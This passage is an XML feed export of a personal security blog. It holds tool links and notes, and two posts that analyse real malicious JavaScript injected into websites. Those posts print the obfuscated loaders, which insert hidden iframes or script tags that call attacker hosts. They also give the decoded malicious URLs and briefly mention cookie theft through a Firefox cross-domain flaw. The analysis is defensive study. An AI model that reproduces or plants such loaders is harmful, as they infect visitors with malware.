<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-15897828</id><updated>2012-02-16T09:04:18.096+02:00</updated><title type='text'>Security Staff</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>29</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-15897828.post-4037584388057467849</id><published>2012-01-26T18:42:00.002+02:00</published><updated>2012-01-26T18:44:18.903+02:00</updated><title type='text'>Reporting for Nessus</title><content type='html'>&lt;a href="http://www.woanware.co.uk/?page_id=143"&gt;Network Scan Viewer&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-4037584388057467849?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/4037584388057467849/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=4037584388057467849' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/4037584388057467849'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/4037584388057467849'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2012/01/reporting-for-nessus.html' title='Reporting for Nessus'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-4341841391153088957</id><published>2012-01-03T18:01:00.001+02:00</published><updated>2012-01-03T18:28:43.200+02:00</updated><title type='text'>web-based threats analysis</title><content type='html'>http://wepawet.iseclab.org/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-4341841391153088957?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://wepawet.iseclab.org/' title='web-based threats analysis'/><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/4341841391153088957/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=4341841391153088957' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/4341841391153088957'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/4341841391153088957'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2012/01/web-based-threats.html' title='web-based threats analysis'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-4662046993363624539</id><published>2011-09-14T01:08:00.002+03:00</published><updated>2011-09-14T01:11:24.058+03:00</updated><title type='text'>Code Search Engines</title><content type='html'>Popular code search engines for practice;&lt;br /&gt;Google (http://www.google.com/codesearch , Codase http://www.codase.com,&lt;br /&gt;and Krugle http://www.krugle.com .&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-4662046993363624539?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/4662046993363624539/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=4662046993363624539' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/4662046993363624539'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/4662046993363624539'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2011/09/code-search-engines.html' title='Code Search Engines'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-1620355394547372827</id><published>2010-07-31T21:52:00.000+03:00</published><updated>2010-07-31T21:53:46.036+03:00</updated><title type='text'>unicode encoder</title><content type='html'>http://www.fileformat.info/info/unicode/char/search.htm&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-1620355394547372827?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/1620355394547372827/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=1620355394547372827' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/1620355394547372827'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/1620355394547372827'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2010/07/unicode-encoder.html' title='unicode encoder'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-6183681096887394940</id><published>2010-04-22T17:46:00.003+03:00</published><updated>2010-04-22T17:54:31.283+03:00</updated><title type='text'>SMTPTLS Checker</title><content type='html'>My ptyhon code for checking SMTPTLS  support of any given domain name.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://code.google.com/p/stls/"&gt;http://code.google.com/p/stls/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;If you have an force TLS list for customers , you need to periodically check the list. I could not find any basic code for that, so i have done my own.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;One Note =&gt; &lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;If your SMTP server was not enabled to use STARTTLS , enable it !! Encrypt your smtp traffic without any enduser interaction ;p&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-6183681096887394940?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/6183681096887394940/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=6183681096887394940' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/6183681096887394940'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/6183681096887394940'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2010/04/smtptls-checker.html' title='SMTPTLS Checker'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-4295084855783751353</id><published>2010-01-03T21:50:00.006+02:00</published><updated>2010-01-03T22:08:20.186+02:00</updated><title type='text'>Online virus &amp; sandbox links</title><content type='html'>Online virus scan links.&lt;br /&gt;* Jotti Malware Scan &lt;a href="http://virusscan.jotti.org/en"&gt;http://virusscan.jotti.org/en&lt;/a&gt;&lt;br /&gt;* Virus Total &lt;a href="http://www.virustotal.com/"&gt;http://www.virustotal.com/&lt;/a&gt;&lt;br /&gt;* VirScan &lt;a href="http://www.virscan.org/"&gt;http://www.virscan.org/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Online SandBox Links&lt;br /&gt;* Normal  &lt;a href="http://www.norman.com/microsites/nsic/Submit/en-us"&gt;http://www.norman.com/microsites/nsic/Submit/en-us&lt;/a&gt;&lt;br /&gt;* Sunbelt CWSSandbox &lt;a href="http://www.cwsandbox.org/?page=home"&gt;http://www.cwsandbox.org/?page=home&lt;/a&gt;&lt;br /&gt;* Threat Expert &lt;a href="http://www.threatexpert.com/"&gt;http://www.threatexpert.com/&lt;/a&gt;&lt;br /&gt;* Annibus &lt;a href="http://anubis.iseclab.org/index.php"&gt;http://anubis.iseclab.org/index.php&lt;/a&gt;&lt;br /&gt;* Joebox &lt;a href="http://www.joebox.org/"&gt;http://www.joebox.org/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-4295084855783751353?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/4295084855783751353/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=4295084855783751353' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/4295084855783751353'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/4295084855783751353'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2010/01/online-virus-sandbox-lists.html' title='Online virus &amp; sandbox links'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-5160547138024362319</id><published>2009-12-21T23:07:00.004+02:00</published><updated>2009-12-21T23:52:03.869+02:00</updated><title type='text'>Analysis of Trojan.JS.Agent.axg Part One..</title><content type='html'>After founding the malicious site. I have unescaped the malicious JS content. Somehow malicious javascript was added to the end of js file.&lt;br /&gt;&lt;br /&gt;Here is the replace function&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;'h^#!#t^^^#t)@p(!!:($^/#$^/#)#@o@@($r#))^k#!^u$&amp;amp;)t!#&amp;amp;-))c#^!!o@&amp;amp;)m@)$-####b$$r)#.$t&amp;amp;&amp;amp;a@b&amp;amp;(n^$(a!#k^.$(#!i)r)^$.@(l!$i(@t&amp;amp;&amp;amp;$e^r$^&amp;amp;o#t!&amp;amp;)i)&amp;amp;)c#&amp;amp;a$&amp;amp;&amp;amp;-@#)c$#!o)(^@#m)$&amp;amp;(.#i$#n&amp;amp;(n&amp;amp;&amp;amp;e&amp;amp;w!$)t$&amp;amp;e@r@!(r#@&amp;amp;((a#(.#!&amp;amp;r&amp;amp;#u&amp;amp;$#:(@&amp;amp;8)^!0&amp;amp;8$@)0!/($!g#)$(o&amp;amp;#@o^!g!)l$&amp;amp;^e^@.#!c#)(n(/^$g!(!o!^&amp;amp;o@#&amp;amp;@g)l^#(#e&amp;amp;^@.$^$&amp;amp;c!^)n(/!$(g!o^)&amp;amp;!o@g&amp;amp;(!l$(!!e&amp;amp;@&amp;amp;$.#&amp;amp;c(($o&amp;amp;)m&amp;amp;#)/$(^h^&amp;amp;))a^!o!1&amp;amp;(2^##3#.&amp;amp;&amp;amp;#(c#!&amp;amp;o&amp;amp;m(#/)^&amp;amp;i@@s@@&amp;amp;)t)^^)o((!c$k&amp;amp;(@!p##h#)@o(t)^#o^&amp;amp;.^&amp;amp;!c)#o^!m@$/$@#'.replace(/&amp;amp;\(#\!\)\^\$@/ig, '')&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;I have replaced all &amp;amp; , ( , # ,! ,^ $ , @ with escape and here is the link.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;&lt;span style="font-size:78%;"&gt;#&lt;/span&gt;http://orkut-com-br.tabnak.ir.literotica-com.innewterra.ru:8080/google.cn/google.cn/google.com/hao123.com/istockphoto.com#&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:78%;"&gt;I tried to GET the request ( normally, the javascript tried the URL in iframe ) and below  is the response from the server&lt;/span&gt; .&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;color:#3333ff;"&gt;Most of the malicious Server Tag includes " nginx " :) , you may block this Server header on your internal proxy.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:78%;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;HTTP/1.1 200 OK&lt;br /&gt;Server: &lt;strong&gt;nginx &lt;/strong&gt;&lt;br /&gt;Date: Mon, 21 Dec 2009 21:09:55 GMT&lt;br /&gt;Content-Type: text/javascript&lt;br /&gt;Connection: close&lt;br /&gt;X-Powered-By: PHP/5.1.6&lt;br /&gt;Expires: 0&lt;br /&gt;Pragma: no-cache&lt;br /&gt;Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0&lt;br /&gt;Cache-Control: private&lt;br /&gt;Content-Length: 374&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Luq39s = 'o##r!!k)u!@t)#-$@$)c^$o@#m(@$-^b()r&amp;amp;^#.!$(@t@!&amp;amp;(a!#b)n)!a)^)k@!#.@&amp;amp;#^i($r&amp;amp;.@^@#l^)i@t$!e$^r#&amp;amp;o^@#t!#@i#)!$c#)&amp;amp;a$-^c@^o#@(@m@^^.$(#^i)@^n$@&amp;amp;n^$)e$(w$!t#e#@r^#(#r#)@a@$.#(r@&amp;amp;u#)@'.replace(/\!&amp;amp;\^\(#\)\$@/ig, '');&lt;br /&gt;f = document.createElement('iframe');&lt;br /&gt;f.style.visibility = 'hidden';&lt;br /&gt;f.src = 'http://'+Luq39s+':8080/index.php?js';&lt;br /&gt;document.body.appendChild(f);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:78%;"&gt;&lt;/span&gt;&lt;br /&gt;I have decoded Luq39s with same way and the current malicious URL is below&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;#http://orkut-com-br.tabnak.ir.literotica-com.innewterra.ru:8080/index.php#&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;You download an com file, called &lt;strong&gt;istockphoto.com&lt;/strong&gt; from the side.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:78%;"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-5160547138024362319?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/5160547138024362319/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=5160547138024362319' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/5160547138024362319'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/5160547138024362319'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2009/12/analysis-of-trojanjsagentaxg-part-one.html' title='Analysis of Trojan.JS.Agent.axg Part One..'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-3174273192493641530</id><published>2009-12-02T23:12:00.002+02:00</published><updated>2009-12-02T23:17:06.511+02:00</updated><title type='text'>Nesssus 4.2.0</title><content type='html'>Nessus has released 4.2.0 version. There are some major changes like web based management and report comparing module. Web based module is a flash interface so quite fast and useful.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-3174273192493641530?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.youtube.com/watch?v=3RgOtjv4v8E' title='Nesssus 4.2.0'/><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/3174273192493641530/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=3174273192493641530' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/3174273192493641530'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/3174273192493641530'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2009/12/nesssus-420.html' title='Nesssus 4.2.0'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-5340775259174415045</id><published>2009-07-27T15:44:00.000+03:00</published><updated>2009-07-27T15:45:50.144+03:00</updated><title type='text'>Moth</title><content type='html'>One of the good web application testing platforms. &lt;br /&gt;&lt;br /&gt;http://www.bonsai-sec.com/en/research/moth.php&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-5340775259174415045?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/5340775259174415045/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=5340775259174415045' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/5340775259174415045'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/5340775259174415045'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2009/07/moth.html' title='Moth'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-4853159021885644525</id><published>2009-05-19T20:34:00.002+03:00</published><updated>2009-05-19T20:37:34.543+03:00</updated><title type='text'>Browser Helper Objects and TG</title><content type='html'>Browser Helper Objects are used to extend the in-browser functionality of Internet Explorer in a way that works across all pages. (Java, JavaScript, and ActiveX can work only within the context of a single page or set of pages.) The Google Toolbar Helper Object, for example, adds a search toolbar, context menus, and pop-up advertisement blocker to IE. Other BHOs have more nefarious uses; many spyware creators use BHOs to record all of the URLs a victim accesses, to manipulate search results, or to redirect error pages to advertisements.&lt;br /&gt;&lt;br /&gt;A list of Browser Helper Objects installed on a machine can be found in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Explorer\Browser Helper Objects.&lt;br /&gt;&lt;br /&gt;TG as called transaction generators are more sophisticated versions of one-click attack. BHO's also may be used to genetare TG attacks by using trojans..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-4853159021885644525?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/4853159021885644525/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=4853159021885644525' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/4853159021885644525'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/4853159021885644525'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2009/05/browser-helper-objects-and-tg.html' title='Browser Helper Objects and TG'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-1518742528928797737</id><published>2009-05-07T20:50:00.005+03:00</published><updated>2010-01-03T22:14:42.694+02:00</updated><title type='text'>Malware Javascript</title><content type='html'>One of the biggest online advertisement contest web side uses a kind of web2.0 javascript pack. I have found a malware javascript code at the end of all included js files.Here is the code below, let's start analysis of this code.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;function(){varsmtbX='&gt;76&gt;61r&gt;20a&gt;3d&gt;22Scri&gt;70tEngi&gt;6ee&gt;22&gt;2c&gt;62&gt;3d&gt;22Versi&gt;6f&gt;6e()&gt;22&gt;2cj&gt;3d&gt;22&gt;22&gt;2c&gt;75&gt;3d&gt;6eaviga&gt;74&gt;6fr&gt;2eus&gt;65&gt;72&gt;41g&gt;65nt&gt;3bi&gt;66&gt;28(&gt;75&gt;2e&gt;69ndexOf(&gt;22Win&gt;22)&gt;3e0)&gt;26&gt;26(u&gt;2ein&gt;64ex&gt;4ff(&gt;22NT&gt;20&gt;36&gt;22)&gt;3c0)&gt;26&gt;26(do&gt;63ument&gt;2ec&gt;6fokie&gt;2ein&gt;64&gt;65x&gt;4ff(&gt;22miek&gt;3d1&gt;22)&gt;3c0)&gt;26&gt;26(typ&gt;65&gt;6f&gt;66&gt;28zr&gt;76zts)&gt;21&gt;3dty&gt;70eo&gt;66(&gt;22A&gt;22)))&gt;7bzrv&gt;7ats&gt;3d&gt;22A&gt;22&gt;3b&gt;65&gt;76&gt;61&gt;6c(&gt;22&gt;69f(win&gt;64ow&gt;2e&gt;22+a+&gt;22&gt;29j&gt;3dj+&gt;22&gt;2ba&gt;2b&gt;22M&gt;61jor&gt;22&gt;2bb+a+&gt;22Minor&gt;22+b+a+&gt;22&gt;42ui&gt;6c&gt;64&gt;22&gt;2bb+&gt;22&gt;6a&gt;3b&gt;22)&gt;3bdocument&gt;2e&gt;77rite&gt;22&gt;3cscri&gt;70&gt;74&gt;20sr&gt;63&gt;3d&gt;2f&gt;2fgu&gt;6dblar&gt;2ecn&gt;2frss&gt;2f&gt;3f&gt;69&gt;64&gt;3d&gt;22&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&gt;2bj&gt;2b&gt;22&gt;3e&gt;3c&gt;5c&gt;2f&gt;73c&gt;72ipt&gt;3e&gt;22)&gt;3b&gt;7d';var ujt2o=unescape(smtbX.replace(/&gt;/g,'%'));eval(ujt2o)})(); --&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;there is a replace at the end of code, it says replace "&gt;" with "g" so i have replaced it and then urldecoded the code =&gt;&lt;br /&gt;&lt;br /&gt;33function(){var mtbX='vara="ScriptEngine",b="Version)",j="",u=navigator.userAgent;if((u.indexOf("Win")&gt;0)&amp;amp;&amp;amp;(u.indexOf("NT6")&lt;0)&amp;amp;&amp;amp;(document.cookie.indexof("miek=1")&lt;0)&amp;amp;&amp;amp;(typeof(zrvzts)!=typeof("a"))){zrvzts="a";eval("if(window." j="j" scriptsrc=" id=""&gt;&lt;\/script&gt;");}';varujt2o=unescape(smtbX.replace(/%/g,'%'));eval(ujt2o)})();&lt;br /&gt;&lt;br /&gt;Malicious code make a request to gumblar.cnn/rss/?id= "j" . I have tried this site with standart windows xp system without any protection and it exploited my pdf viewer and then try to download some malware files.In my opinio this code belongs to an virus payload. Somehowe this virus infected the web server and find js files to add its payload to them.&lt;br /&gt;&lt;br /&gt;"replace" function in javascript may be a part of malicious script. Websense and other webfilter tools web robots parse these js files and make a signature based search for malicious attempts. If you wanna do it with yourself web mirroring and string search also works.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-1518742528928797737?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/1518742528928797737/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=1518742528928797737' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/1518742528928797737'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/1518742528928797737'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2009/05/malware-javascript-payload.html' title='Malware Javascript'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-4802664060597514453</id><published>2008-12-21T21:49:00.003+02:00</published><updated>2009-01-04T16:29:10.584+02:00</updated><title type='text'>Cross Domain Vulnerability on Firefox</title><content type='html'>Mozilla Firefox 3.x before 3.0.5 and 2.x before 2.0.0.19, Thunderbird 2.x before 2.0.0.19, and SeaMonkey 1.x before 1.1.14 allows remote attackers to bypass the same origin policy and access portions of data from another domain via a JavaScript URL that redirects to the target resource, which generates an error if the target data does not have JavaScript syntax, which can be accessed using the window.onerror DOM API.&lt;br /&gt;&lt;br /&gt;If you find a XSS vulnerable site and exploit it on the user site. You can&lt;br /&gt;jump other domains on the firefox browser and may have a chance to steal the cookie ...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-4802664060597514453?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5507' title='Cross Domain Vulnerability on Firefox'/><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/4802664060597514453/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=4802664060597514453' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/4802664060597514453'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/4802664060597514453'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2008/12/cross-domain-vulnerability-on-firefox.html' title='Cross Domain Vulnerability on Firefox'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-6766881636004969075</id><published>2008-09-18T11:11:00.000+03:00</published><updated>2008-09-18T11:27:41.072+03:00</updated><title type='text'>CookieMonster</title><content type='html'>If cookie is used for session management, use secure cookie to avoid inadvertent transmission in HTTP.&lt;br /&gt;&lt;br /&gt;Below is the link how to steal cookie with SSL&lt;br /&gt;&lt;br /&gt;http://www.gss.co.uk/news/article/5412/CookieMonster_nabs_user_creds_from_secure_sites/?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-6766881636004969075?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.gss.co.uk/news/article/5412/CookieMonster_nabs_user_creds_from_secure_sites/?' title='CookieMonster'/><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/6766881636004969075/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=6766881636004969075' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/6766881636004969075'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/6766881636004969075'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2008/09/cookiemonster.html' title='CookieMonster'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 